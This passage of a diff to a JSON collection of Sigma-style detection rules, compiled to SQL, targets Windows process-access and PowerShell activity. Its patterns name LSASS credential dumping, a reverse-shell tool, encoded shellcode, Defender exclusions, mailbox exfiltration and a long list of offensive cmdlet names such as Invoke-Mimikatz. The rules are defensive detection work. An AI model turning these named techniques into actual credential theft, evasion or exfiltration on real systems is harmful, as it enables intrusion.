Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess 
= '0x1fffff')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 
'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 
'%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "status": "test", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR 
ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", - "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", 
@@ -6161,39 +5692,38 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "PowerShell Remote Session Creation", - "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "author": "frack113", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "posh_ps_remote_session_creation.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -6202,250 +5732,291 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE 